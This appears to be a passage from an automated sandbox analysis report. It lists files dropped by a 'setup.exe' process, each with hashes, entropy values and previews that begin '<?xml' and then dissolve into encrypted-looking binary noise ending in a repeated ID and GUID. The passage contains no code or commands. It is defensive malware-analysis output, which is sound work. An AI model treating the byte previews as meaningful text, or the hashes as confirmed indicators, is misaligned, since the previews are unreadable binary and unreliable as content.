              Preview:<?xmlo%..i=^.4xc.[..T.-#<......g/.@..jbc.x...m.......J..`..:Y......l?....+@Q...T.p.iG..Wy.om[....G.k....=$.r.aS...'W..a..v...UO.2.bZY..j.Q...,2.h.6.].S.[z.""......P:....c.$...Hx^..ft.a0...O.....TX........N.MR.S[|..J...:6G.e(.Nb..e...8..h.=..c.b..[.{..^..........1..*.p5o.oc...Eq..Qf....$...iL.E.c...F..bw..gyGQWb.|.F....aM...'..hS`M.....?+.R...@kx....K...w..)__......J.y.i.z+F...j..........En.w.=.......eZ...z....Lf*.r..!V.......f,.uc..,./+.Ff6%L+(..eY>.o.{$.r.c.M.5.....V..~P/.y:0T......K.l.o..//..=%.".....G#.-.'...PGyFVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):851
              Entropy (8bit):7.704420362195783
              Encrypted:false
              SSDEEP:12:tgs/W7ZBjKPLKd9vX4mHcASfMbxZUvLy9TXNAm+6zzkSec0zMhiIrO+mX/j/Zjcu:mVlKPLKdF4NAkLKNMSec+MhiCmv7LbD
              MD5:82608697F9380D8799E2D22513966D8A
              SHA1:2B9C5EEBD92B90BE816B4F6090ECCDCA5E59593C
              SHA-256:A787780CED481C58F2AED15100B918848ECFC038076819D523711764C375D5CB
              SHA-512:AF2F3487E216167516FD4117752641CE1DA14092F751428E5FF2F3D372597924432B36579E66A2D00B139992F39BA08186D19D2CC2E8787EB597388E730F44E4
              Malicious:false
              Preview:<?xml..7l..................kq.b...7.{P..Uzw8...jlpx.|pn..lG...J;.......{...jVB..X.....k.a.{(..g..J;|.K:..Y.@.......}..a...Ai.Gz....2..L..S...V...C$..w..6..`.Z9f..D6y.F.s.}"J.C....P"!#p.R...W.$.O.|....s.<?N.d+.-....{...c.w..<.....0!sVI0j@..*.Y......w... .,..j.c.S.O..Dn.XV..j.....L.L.c..+..s.o9.kh+.B<.d.}..h.G....~..X}(.....d..h.{.b..c....NiI.$.-Z.I.u.hER_]m/9o7'.B.F.8.N...~.1X5l..!&;."..q!.s.)b8...l^B.nBR..V}.|..p1.\...VP.<....}$..V..Q.j...G...(..TvD.V~JV..qs..9..)...A.=..:.p..!.).............<..........S...z...\...>.5....k.wL.c.....$+........(..Z........8....p7.9..Z.0..$k". .....W<.. ...%..B.1e.O.B..H....zLt.B...+C5`.Sy..d.M.No...}.m.L.t......_....Q.....\jO.XK....g).i,V.F.s......_>..O..P.N.M\>......pA..D..8<.vv9q.R.%{VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):6314
              Entropy (8bit):7.967892189708212
              Encrypted:false
              SSDEEP:96:MZ//KSz1aQFvsFUAbsmiFl4mzcX+MzU+Eyq/N+hKq1NtbEQL7YOCLX2:MZ//9a1F1bsmGz0NzU+EJ/NI1DEQLxz
              MD5:16CBD230E966C621766C3D1A791148BE
              SHA1:8C6AA81F815D20ECFE1222BB7DF7A56A9EF4B26D
              SHA-256:C506E8F3227DD077773163589FB90E8337FEEE64133A949C0CBA71A71769FBC9
              SHA-512:D9721E391B5DA43A5CE2D042B27CAAA41D73739A1B864E0D9AF0D929E1309B9A659929B5C5E684405F9F9570933DA465D549A541091004BF5FD6DAB69DDB8047
              Malicious:false
              Preview:<?xmlY..^;C_.?.H..x..$.O.Jxh ..O`.cJ....-&....mU~=x..Q.U.m.=.o.U.JN.l...HO.'Im..8.<..7k.^..6.._.........f....'.-}u..B..u.u..?!.....w....f2..cD.....}:.iT.R....a.Mw.....F.-...A`.UW.'L...5.y....Kd.Ge.T......L.6..\......f.....p...,}.....q-..5.g..@R.../\.,'x.c......D.<.....:.h{.:.5Wa8R.@..)..e.S..B5......Bl/]S!.........zo5..VR..*g`.C5..t.5...s"-.V....ru..._^8.......q~:.v<......4za.n`......o.h.=?....%......!...hX}...\.mD......U.._ ......zZ..'.^p9H...<8./J...U.~..7...8.B...B/..Tr.[...=...*...x..o...h.a.P.H..R..U..'.[....`..Y!...#.^#...A......t4.+Y..i;..:^..=....{u"..0.^.Z..g..6?..'...3....l.g.....FEW._m.L.O!....j|6C...*.I...L..EZ..(.|....T.y..&.....SRy.(....o.cM.Lyu{..U.......:.#Q.}...&.<...@....'.,.d.`:...Ok.....{.............3.{C.`@.wU....=%.=......I..-.A.....b..v=._s....=p#+1.<.5|Am..G_X.[.....[I...J.h.:\>~.._.p...........ndYK..|.._....3'...... %..CZy....*..ju.....l..c6.0....O.(.\.....@n.%Ui.b.d..6.G..U.T.#....x.........7q%8+.&.&..F,.P.m..>
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1029
              Entropy (8bit):7.809405323642127
              Encrypted:false
              SSDEEP:24:sHab/jxXoY2u8GnuOYBoa5wGLzKSMRA6LA2QkzxqIAWbD:sH0cVGnuOYBuGLWSADLqkdqIVD
              MD5:1F7E5417E0DCE5B469E165810ED998D2
              SHA1:9637F16D1ADAD4A35E46ED7CDB004BB2FB659FF9
              SHA-256:7DC2D5BAB853FF6A56E4B0318C68F1F3337CF9C10D500A6428C5F1625F92E0EE
              SHA-512:199CBBB60C8BB98CE2F0B8815DA5DEA6F7609105E088AE3D3DF14064569599D4170544E1C1D9A310DF168711DC1D8E6ACF3A658CE45B54937FD9B38E52AB847C
              Malicious:false
              Preview:<?xml..9...x~29w[(...[._E~.g{eZ..;..<#...8..d...-...st..3....=e.......d<.&...F.....q.....v6...V.J.J..F.....#..%........S.z...gd}..R.WK.S..$.T..z...a\~g..*.|n.J=...N?.H..jzn.=s.V..^{..X'{.o.=7.n.m....t...+x.8". &F6S...{[.X.H....g..(.........c.^..<;U.gz....T....]..~.r...)Lv...`?QGf.y..J..5...XOeg.'.yK.>5.ch.e....g..x.."7...kE.e.>N...%.3.n..8zK.......S%. .K..'...TW.y...G~ c....a`.`.>.`).>.....F.y..ufM..I.F.o.0sn.........~(.....:.s...ZN....K.K.%C..5.9......4...U:]Ye..?.".k.$f.....[..i....D..c...tq...`.z`..P....saZ.NtV....Q.@_.b.w..-_..,.s..r..].q....N..5..<.I.........b....9?(U.,H...N....z%../j....w!.!...;A.P..F.[K..d..!.M.2..#M@..|...Q.h....~<,<[u...t{....QXu......1.I).....zsP.q...$..........O.R..|56(.Op..S..W.O........)Q|b.0}@......J.s.V.M..!L.....p...9.W..C...Xx^..8."w....x..~.y.c$..'].^.{.......2..f..U.....{.?x..>..Yt.C.H.K.X.<.sH ..=.#.` ......[-a.....o.....h.....i._......o<...X.{...#...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1040
              Entropy (8bit):7.802443888853122
              Encrypted:false
              SSDEEP:24:7aTX9uyUGwYGnOz1OFtVAsYplVYNLtsz5PxzTmYbD:YtuyU0G4OXOlV2LqVZWCD
              MD5:BA2619B462A1DE9CDB51DEC53CCFD2F0
              SHA1:450F3F521D712D922F4464EF797B20EC57DA9D47
              SHA-256:36A2E8A6555E7B6036DD96B0F6F1741D7539DDBA6CC5A7FFF7511E65BA89B270
              SHA-512:F11E74DB14C8700EEC7CB559B3F4CC52BEDCDB282C249131E7B79ED005B8D50A7903FEE1CE697DC09AC0860ED34A8628399E4E6FF09CD524965C4CE9AAA5BA7C
              Malicious:false
              Preview:<?xml..uC.%.V_..Q...#...N...MY...J....m.......:p.>..{.l..@....^..b.1.....}..LG~......#xR.=1..n..eD........>.c..8?U....P....s.@.Z...nh:..a0~,l..0..q.A.)&q..p?p.O..-.b.......Y*g.M..R...^nN...v.;z.g.,m .o.22..F.N.p#X....(..."...r..q(.Qe......r).=..r.d..'.}...0.^}.:v_...T.,.f.#.V....Q.JQ.d.P...0..~..g..4.'$v.....Y.\....H>W.v...z.%....j....h....Yi.Y.$t.}.0.rh..E../..+./..j....Y..k.i.~..i.}.K............Ef....|..pE.&.._..mA...hD.:........:.Y....zQ...T9..p..F"K...O.S(*.]}...w=.$..K)....!..-[6...I&J....^.%(an9w#.'D.A"..%.Q..?..:C..s..3.>.....U.>....0[...v[...y.h.f<......f...C.$j:=....]y...[.\.~..._.?FV1.u.: |.A.."..a........`.vJ.W.(.._.UWHd.Q..,q.Q.....6v....Q.@.a...X.z.jO..R.K;. +.yo&.#.Q..t...3....x.v...G....;bO....u.+....Bs..7.A.$.O.:-.W..hQP:.....F.-..6o:..d.......c.........x...N.V...g..;..1..1y.E..Zov..B..Z........;..<......S..3.Gd..-...:..9g.0t....U.xLUl..[.U..|j2..HzDlCv.$..i.E.L...P.".}_.[.Lq.."VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnH
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1415
              Entropy (8bit):7.866118159375637
              Encrypted:false
              SSDEEP:24:aWs7dCTydY278nTYXW5VI+w+yvcarJ88dOhhD5rpZhS7esKiuzykVicb+LVKg7X5:aWisVYg1wdW8dOhh134egpkVicyDuXkD
              MD5:0D289EED5B951E5A10A35206D49428CD
              SHA1:A1725588AA3D2A56A7DD8110769BB5A9B2C5C08B
              SHA-256:5FB4D6DF42C3C5E1D10172B34746AEDFAE512185B3E827A4C230AA099D8D9788
              SHA-512:3AD63A7CBFD7DF2DE9EBDD76F35E067DEC2CA7EE63AF6294B4E7F0D7810D657E836E9744412363D20887275ED392B70F755073393E7834515536DD2C04A3DDC0
              Malicious:false
              Preview:<?xml...*_.7..Z.;jP.oO.....z.3..c .....A.1\{e.n4.......<...k.,h.F+..ei....Y.......B.,i..B...S../b..ia<K..S.I..PV..._.b.. ..,.b/1...O!oi.t............]..s.GM.........i.e..|.y..l..k..A._.........,.V2..LX....^....U....S....3|wUp+4.)...J...j...b...^|;w.Q....6.eW..K..D.._..j......C.3....].0J..._......|.4*[.w.H2q.UK..BH.+...1...)(..7..fv.....{a.f.:H...........@.}.DM..n.#..h3Kl......B@.."Q. .{*.....m...ze.`*.PA('-...su.......I..!..bC.{.zx.....x......,b.I6..&...n...Eo.y..My.=..M.m.. ".........7P.C.F .>m..#.H.H\*....F..jI.......[N.EB".Z.-L...9./>.k..A&..c...]...C.}@.o..3.a*OY..).I........w......|.......DZ_.4.......xE..Tb.c.7&tm.[...c._v..G....w^....u.'Qx.+...<..e.....*.t.c.U~.~..f..2..%)...)c8...&..{...Ra...Z...Y...E....|....RS....'.J..oX.d...~7..}[....bG.P.X..r-C.\-<.i(.+H..4...Qi..|C........^-lZ8.@....`e|'..!R..L.L..t|....1...G...M...6.>..H.{@2..8...$?"Tn.e?...&76.!....A..\..2.?."a(.?`.....I.m/G....F.^..X...,.\./j.."x...=......cf6.......4..j.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1073
              Entropy (8bit):7.827784489936183
              Encrypted:false
              SSDEEP:24:RvVyaA+UW97M+Ozd06R7i+mFkcv6Q/HL5CYbD:r2474dmFkcSMLRD
              MD5:83B38E37C7D1B40CF974BFFD333DDF3D
              SHA1:087561563AEDD7E4B17E0F20573035F779EF45DF
              SHA-256:0D32CC61AAEAD0A1059B2D921345EFA75E50EAD62E0D808A1141CD6DF9326EFC
              SHA-512:830C22889167F6AE3D5417E54A0670E27904FC21B4A7032FFEED5C9E987789926091C93EFD7CE936D1FD269E8CC9220EDD473C716DECFDDED17F24EF411E8BC3
              Malicious:false
              Preview:<?xml(6..]......n.t........e.Rk._...=..h6y.z.}.3..%.tIp...q...>.}'....m.=.}>..q!...F.....MQ...9...".;c|.a.Zi.|.H5.v....6W..W..+ch...f.%.,.5].HK....y..%....:....~T.6+...>...,v...M,..K......:..l.........AB..l...O...W..S..N=q....&.,...........b.y...?.U..&.x........R)..9..8.A.....C4..;....Y..e..:.k.pg..`.T.6s1<U.~..HY.X. r<v..!X.Oo..Y.w...I..^.O ..Q...6...MM..........7.....4.\.E6.Y&)b.B/..;&.f... .wZ].1.i....m.....h..|r[wU..........PL.NK..f.9).#.j.e...PY......G.Iz.^........P.2.../...I0......\.R..A7o.'...._.....%...j9..~.Y.k..=.Q).O...t....l....h...I1..>.....p..<<..;Zf+....-..K...b*............5 .g..C...`...O0s....q<.0.Mf.....08.....i}D>.b.X......\g&?5.W|Y..^....x..AH....g.nL....k.#?.f...:cn...F_..A.=Z..z.Og....W.W..K.n.Dy...k.Z!Nq.A3..~..s......=h...?.d.y.?<.s.../....%.(05.t......4....4Wm..y.y....Y.L]T..j3.U..j.>.....4..z.....2j..k.`......6.L,.X.t....sj..........iY.uL...J..[.K*.q.m6..."..[.?^I.@A..q./.%L.S....r..."....J(.g..SQc.\$...VrBq0
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1154
              Entropy (8bit):7.824392748293812
              Encrypted:false
              SSDEEP:24:jgSEXO1h2pYfz/c69evsxhGH07Jzt99r3YDtdtgqXoR/roEWbD:jgSEXOeIj9evsfRFt99rI53gKEED
              MD5:B8C0A8B7692B837B24C3307C42017B1B
              SHA1:3C08F90C9F6F94E2962AA0D425D12F53E6C34E47
              SHA-256:0B9CAB2652CD7FBBFB2DAA8B79FCD7C694BC2E85E0FC01640D9188E43DAE310A
              SHA-512:B4678CE1C7588263D97FEEC9A4E393C570A91DC332BAE6B1721EA035B4FBB4347DE9BCBD2B8682D151945D2BD5B46954000067A952E82F76F694B4A2B8132D39
              Malicious:false
              Preview:<?xml...d.......5.../v.EJ.n..3... a..._.....p..&..-}............8.;E....(.._.*i.%..)...3...,..Y.1.1<.+..sLm..+...=..F..j..d.DnW6..r..yrx.[.]=.r..+.*.../?.ta.......`v.....p....a...W...............x.i~...x...W.....c..5.jB.!1E...]..*............L.,M.7.q.K....+...}..SL|w$.....h\..Am............A...}dM..o.x.*Lw..^.[..y[.U.8y?...L3<.S[.xO.-+....{3...-...t...v..'..:.+.AM.TA.w.iv..Z.....!.....~.....!P2..1..JX|.RV...!.q......_.\7=....F.hb0...N..r....8..rg.m.@...e._..%|..GWZ{`er....\?bx...\/{.o.d..'T..o.UP|..I...VI.-.../..oA|.b....[F.Ld..K...|...A;9c.w.....Ob.7....3.Y...j.3..EQW.........l....l.....K.Z.v..c".....0y... Se...Z.X.?<.W.....;.\..!...#s".o.<R...Y...!.WU-.m.......1 ......ds.P[6.e...5 .Q.q....N..2.$.S.G.HyR3.2.P.b._.]........p.T.%....5.~g.8(.&...R0. .e.........+...h~.i..G..?W..0....."6.0a..u.k.3.b..j.I.]8... ]..F..Et........./.......pIC..fL.ZF#.....L..x_..%...N.Y./.\q.x..!..\..F...2....f.#.."]...[OXN.yRe*..........H.G.P..e..N......}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1902
              Entropy (8bit):7.907510971313485
              Encrypted:false
              SSDEEP:48:wusxMR1lFehe5LLfdIcFL6Xa+fpf5D4CTkDAxUD:wub4aLLfdh6J/DzkDKA
              MD5:900B35E018359A04B3927F9C10169FCE
              SHA1:CD70C77D1856E47AE34A21F81EB2110FD16175EA
              SHA-256:E43F25EB3852A2FCFD13496FA2DBEF82D012599117E455BA3699A8F72FB25B2A
              SHA-512:1B40F8B881922C8D627F30B09732527E0867E06C4FF718844022F063D2264931DB7716A0AC5E0C15F5CA7924DA1B9BA9AF7A72E42DE49C9711EB768EA5663C76
              Malicious:false
              Preview:<?xmlM........p.T.....).r...H.U..W......k.B7|y........|..#!j*T.C&?..B.....M.lU\.....y>.r>.g[.eO...u.....M.X..f{\m...".....B.x^.{T:...T...1...yD4U.:...~4....q.L...HrW?e....MtT.B....c....Q...l.h.^.!.92...x$....+.}&w_q.r.QUC6.:.._l.Q*V.8..+I...p&5.....w...T...(...f....`......Z.=.....rI+...m.=J...]g.t.......,.n......2.......e..Y.h....64...m=$..R. ....U.fi.......Fl....X..a]...w\..=.s.U....'M]...sk........7...w..k$.6B.6..\}|k~<.[......[...bh.Xp...Gwv...t.*A...}.w...du......\...~.....b51..bpE..@.F.2...|.04.bSJ......@..G....~._(.PE...#~.t.ARW..>....3.i.y...h.c,.mU..9..;G.CO...M.i.;..Z."...#-.k..8].*L.u7..<.=S'....6..cV.}<.r%....D...,..{.}.YI...ap$+...a7..H..)U..y......s..H..X...^.M....h......m.^..wT.4.e.<.?...{..$....(..J-.v....J=.g.....?...$.c.t..7.........I.(..AF...&E.dB@p....yR.V.s......c-v.I}..%WD.S.{h.p..j..vR.2.jG.az.-.U..V..%Z..e..wW..OQ0Es2........_... ....)%....?..Q...Z.\.!:...=h..h......K......8]*...n..?,..0..a...4.xD7..>p^....n.N~..Y.9..z
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):712
              Entropy (8bit):7.673618642537811
              Encrypted:false
              SSDEEP:12:5tDDTkuAqyeoNLjLJgyUOVRGtOKsxLioQ/Jos4gsL8+N3ksMR2cii9a:TTknqye+jx7u3ePn93tbD
              MD5:4F05DEA86F61722FFAEF4F20A14D1D9B
              SHA1:9F8C692FC4A0BC7C2E4CC3EF632362991AF74A75
              SHA-256:8688DF780929896410F6FADCF7022A821D86B0AB4C020A3B403670C14513E4E7
              SHA-512:680154AAFD5F9CDA15783574E91491B4E6DB3E65CA9BE0BD03772AE7C57AACFCE38BE2E251747676028417F168395442D01EBCEE09CD58228CD7FF0107F135CC
              Malicious:false
              Preview:<?xml,.....b.<.x5..@M....XO..1n.!>..n.O..[...&.~H.....:..;.SP.[.H`(d..Cgx....P8.N.(...+}..8...@..yo^.*@Mo...<r..W.$....4\.g..I.K..... ..r/.5........Q..j.'..v.+...6.f..2V..6vifL`U.....~...........BVU.q.#$0./........HkQ..$Fw....j7U.c8=$...U.-..d.C.Dcd..~,.a.."6o;.#S.._......TR..;Y.!b..r.cl5.^....s....Z.+Z.!.L-..........|.U....q..y..Mu.d..t..v!..d.Q.n.n^@$....HO.......s.....4Z.I`rl.H.[.KRM.$....VN...s..4,.J.:c..bQ.\../>.$0l...=&x.i.K.l..I.......2..Q..,e{.T...U...8.J.Y.N..bV....e..U.......J.1..`..L,....._.K.o,kX:.1n.3<s...5.G.UL.n.5a.J...*...3......}.8^A.y.W...l....xU.s%v...D.0'+...~...A...U\.%.k`..D.Z^BVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1707
              Entropy (8bit):7.884300773139131
              Encrypted:false
              SSDEEP:24:622LxSlJVBHZXpSnQl8xYfk+3tiuccGLDmFkaOohRKILUMf5B0ub/Ei87gbD:j2LolHsO8CffaokBWRhLUg52cEig6D
              MD5:8AF2DA7CD40F63BE36E0C8F672F506EB
              SHA1:F3886BE1CD56A71FC8838226838F0D316EA93CCA
              SHA-256:75C1E333E2E971689AB347BC6F8BB9DEA200FAEB793F72F9C3545FC3E22A5C44
              SHA-512:0A2E4674190910F3E3A8568A9EF7A9B8A48D38E3657D31544448C4778606D7FEE93FCC7EE9D10583AE94A419C9D72CB8D13FF2C9F6D1D8CEB657344884EDC8E6
              Malicious:false
              Preview:<?xml.>...B%.`V....J..9...`......J..`6.i8.._.M.?._.|.C....>(..Fo...T.Nk......T..x.K.....`......o...H_V.....p*...l..0.F;.&,Y....R....;.wJu*....in&@@W\O..7...A{.@=9y*M.;..!@+..s...U...P.q.....}`.qv..=.G......'b..WS.V.O......?.....2.`.?E..".W.A.'c..@*.D.!...6.. ...k...q..X.9&...I.i?.)g.*..Y..y....in...VX.riy....~3......X.(W..+.....<.......TR.....^e..P.k....9...Mf8.+.M.+.-9Ip|..+..u......&.......Tz'.;...5N.zM.'.ygh..a\.$x...|yi.v.w.0.-.....P...4..4..U~......T.../....Y.{lP..}...z..X......<..........7l:.a...S...4GR.....3.@.s..$`,O...z..6..o...v...8H&...xy...9UW..1.@...7......l.$1..2tB...e.../*_...E%. ._W...&m...8`.i$.\z.h.Y2..*.6.Z..4Z.].S..W...*.....vF".......-.-.L.n..[.7z...6Y.z.Dk.>m.M/"<}.......~=.+.".p4hw.o.M...).G.D......i.o.-....s.*.S.l)nY..uYi.J......2`..QCh.........W.l...A.u.z0....od.lj!.&7..q...7.....".... 3.n...p....s.].`r.I....r.../(.k!.4..<..9N--.,1fn>..l.eXo!.....b.{...4.. ......I...S../...................../././.zj.....A.......<j
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2111
              Entropy (8bit):7.904937766482895
              Encrypted:false
              SSDEEP:48:HdEuyUMH/rSsr4xngfuy025g6uK6cKFr8j97WHQYzv5Qk3aM1C9kkIKQD:HdEflr/rygmyPN6Fucwyke
              MD5:6143919971F807485ED5D2C004FD9E2B
              SHA1:ADB5DDA38E099A586434F4BDD9FE450D8EAB59CD
              SHA-256:589EFF0F34BAB0093E150A6F7B454990CAD4FA960F536CE18189EEE6522BE7C5
              SHA-512:5C471240B7553B3AA6118473376741328A033571E10B5D0F5C1406E1041D005FDD769B19BE569D48CD96F3A0EA4B5034FC71A8E9451022D7F4105AFD43646004
              Malicious:false
              Preview:<?xmlf..N..z.wu...:Bcv....U.~.?..$..m.K......8|.D.pB.p...Q.T.._.0...r....<..t.D......fU.`[..IR...N....x.P|I&.t...1x.g..=.t..>.....r....R..}h\.6I....V6........!......7v...F..J..gFQz.V,..'.../...a.%"..&.Y.6":%'.......Y.y ..h....:n..!....d....*z...~....N.....u...B.........B....-..."............xJ. ..K.<......k.rC..j(4.<uY}......H.z.Lt../.b`.B.@..2..P...5UZ...2j..$..:L....><.j.Qs.rK! .........<sG...._f...}..r.cJ.F...+:..&'.+..v.3.HM"z."E...d.aJ.,...).}\.#....K....@.I..b6.L.'.H...@9.b.....!.......<...x..?...D9-.3....'..k2..V7>........+.zX..|..FQ...Y.#.G..n.....b@.".U.......l`....D.....?.l3...p..b.....1\.q.]....t.....l..nO{S.D......r>...'#9.Rs.'h.W..N7.....a......0..84......9H\..1..b...S..."#.67.'.....o..(.....5.y.&.]V.u...~=.@.3tJj|.I-.ed*.kFC.'..p.<EV....tNX...O......&y..v]..3.....p.AEWwL...C...R.@E%.`.f.kX.)..Q/....7......z..s..[..e....68.3.....^...!.g^.y.6[.!.4E....=tD.-J.y&$%..D"....4...SY..+..&.....$........'.Mb:..M.5.u.. M...X...r_>.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1732
              Entropy (8bit):7.884769617302137
              Encrypted:false
              SSDEEP:48:Seqmjl3Jt8s5KTQJ//vPiw7FtQ/FhxZwD:nvjGNQRi6qls
              MD5:4D28A2DBF5ED2F87A45BDC082BF23022
              SHA1:061C8C903EB12719B0B8FE5C3882097930E8038F
              SHA-256:877D6B309CB0E01A267BDFE641D25B2DDF88913D33AFF1C8F8EFED236130B55C
              SHA-512:06F462FA49239D805374C5707CCB55420B90083E49AFA17243B0D4B5EA6933CE1CC104C4EBFEE480CD7340B71F71CEDC959EF09DA5DD6447584E4D70D6026800
              Malicious:false
              Preview:<?xmlU.3....-.u.jTY7!.........6.@.'...AN..<..`.<>..d..........3..I..&W...C74.H..b(%.D..`...k.3BM.4.].].E/.N@.pa2...kY...!..b.c>d..LX..a...j......A.;..P..eM..7....1...w.u...,....i...M.b.2.(4.+ce.d..\....<..~.....q..P..b.4...S)..c....WDq{.......tC....z&+.A.S.&6........9o&.$.Q)....H..!#.I ..%...w?r...3._...(..Q..r/..S.K.Hm.9.W.".4g...pI.6.....Fs..-..2c...i..R....!........&...p.YQ.Y.;..(0xEw....y..!..S%..?.j..+xO2..2%\..M\;...#.4$g=O..M......8.xp.+...&....qt...........`3^.l..jv-.e.....d%hq..3.fc.........%.cq^....u...&-j:.H...Tg7......W.....p...'`.."..j.. w.. ...."^...Y..x.....{.6u...!..J..............vf.y.CB.....jd../E.W.h;.......<8...*.Z...... ..WrH....O.k*$.q...'+GDJ..E..E..5.......)...YN.]]...l............o'..q....p.#.H[w......]..Z...+s.i.+..x."C,m..;<f:9-..V...]..m....QC/.T..5..W.......nH...X....`u.T........&.:."O.....<.......Em...........\.l4.BD.VOXX....n.a|@.=@.g..Z.)+~g.;U.A......J.NE0(..T;EQG..)..k{...ZF..g..$Y..9.AR...i..:;u....)-%.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):935
              Entropy (8bit):7.765332230431937
              Encrypted:false
              SSDEEP:24:r7MJjnEuokmRHwrb9p+BKE05RiVqSjbI8EkUCVRbD:rS2HybKJH8yI8tLD
              MD5:861E04782216854DF6031C258CB96BF6
              SHA1:526C36DD9D0EF15E7905A80A41548150330CB97F
              SHA-256:5430285F31B5EB719517F6387ACBCF2CE17715461EC2549055C606B6EACA2036
              SHA-512:3F53B7A7F1E1DDDEF54B264CBCFD030EBF4AEF6FB68D1DB6A3DA9AF781C0D1C518D4C5886D15B8405F327BBF1508E59F70AEE2D813E135ADEFD716B38FFAA1DD
              Malicious:false
              Preview:<?xml)....{...._.rr..."..Ix...R.Q...Q.(..+bt.{.R..Z..fg%..<..&.l..1G.4P..r.....dp...U~J..s.S.2...N...:7f...wp...D.u....F..T~....cR.I.ri.O...\....Ic.3..uP..s.....}..H..44..............X.Z..HP..=f.".E.4i..0.l..s^...;B.f.4..5..(....j...Y..2......r|...5L...........pV..s........RY<...^....F6.&$9..s..j8.J(..d..s.,Um..\.Y3.K.#..wS..dx.........4......Cy.^<n.e..6.t..e.g....3.cuP...Q.(........>.6.(..*.......Bx.o..m].......0.c|......4.s.N....W".iS~'1...Z.}.,.C.f4(.m.$.3./..p].z_....|./P.LE3.0.....<..l.....".......N..!.|.{....%..z...G....?r......lo.Sr....kG."._.;m.`..=[..I..q.X..).pJ.^b-p7._.^..._s...:...`.U..5z.9L..W.y]..".............}......Tc......x]....3...D..mvS7).(N...:..R....P....M<."..CQS....<..'x(.~...;-.....b`x3....q...(X...O.<7..f....*.m.GBt2.u.IqH.}.qzc.g.sX.:..M...N....Z.7m....e..nM*z.[.`.#.r....=#.'\l.<?+....,.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):980
              Entropy (8bit):7.769551999233222
              Encrypted:false
              SSDEEP:24:VgisCXg0vd6Rbe6hnasQI7fQuQRKA7lfSxLAbD:+0vd6Rbe6YsQITpQf7RSAD
              MD5:A486EB69334F034771662697A7DEF67C
              SHA1:D680AC5133963EE677524BDFF560A017EB854D14
              SHA-256:F37EE290566D5B5BB9FCEA393E34856CAFA3073AD7824AA897012966FCD8DCDB
              SHA-512:28A7FEFE57EEA877676D9DD8A200D00C56F230A50B8A42EF7B05E2D43019F739B8A35637D98ADC559C3D3912D843E8C31CE31D3CDA73D1792BC8A348260FAA08
              Malicious:false
              Preview:<?xml.fT...:#..bPr.`..3[z+.&..e...E...'.|i..@H...C...r....m.W.(....-XzN.wP'.QX...#.[.-(..Y...`...m..V.E.t...]6..Qt..&...He..f.!..0$bI.=..F..=.......W2s..1A...n._>.f. ......^....>&.T.1...b6.S.O+..eJ...S.^..-..EAt...~.fO%G$.n.P...._s.%~..z.n(.O.{A........8.+....(..1a8...Xh31.4@.....K.Do>u.U]$.E.e,.}...Xfm......m4...].$oK..m.x.....).....P....c.b6.Z.....l..;+...r.j.....s...6....Z.....-(ly.C.0"bPmM...Q7.~0........<..-...`|......E.B..=.J8c..X%....K.32%....mqK.b...v$8~.+..i...g..lfB.l..T&.R`.^8~Q..w....v..l..os..3d..'..se,..4}...Y...MNKeS..$h....\.E|=..N..4./...(...0;.@L.S"Q.an...#.........|>.zO..................q....\>.{...B_..F.').Q..U*l.._q.u*..`...K.......j.0.b..J.r...}js.:LJ?o+.t.D...q..h...../3..8=.Zt....i..$...Xs.HG.....E......"........I.X...........Y$....[.2.......t.9..j..".U-g....:{..h.......1...N.t.F.0..%t/.6...)E..J."9.E.y.$.._{P.&.......ip..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2312
              Entropy (8bit):7.912433681741092
              Encrypted:false
              SSDEEP:48:MTDaHfS3khQzFOQORVMG9ll9/rS+A+dsCDDjuUpOJMWItJvF4RsdxMCD:MKH0khmFOQYMOl9rS+bDjuEmKv+ezMK
              MD5:DC60C1BA840BD1C64BDE23EFD0C217A2
              SHA1:100833DC2291A5C12F274EA8CA34B3FC89F0F394
              SHA-256:0D46CD0018C301ABF140EAC66A14AC78ECF3C1C2E0F56F5CCBD1EE7E29C748D0
              SHA-512:D4180BF9535FF4DFFF04D3D6CDD1C58A2267C88E6C36DA36FCBA6805766781415CB112034CCC6319413580A0A59D0BB51EF82DE0724E508EEE73C8BCAB2C2BFA
              Malicious:false
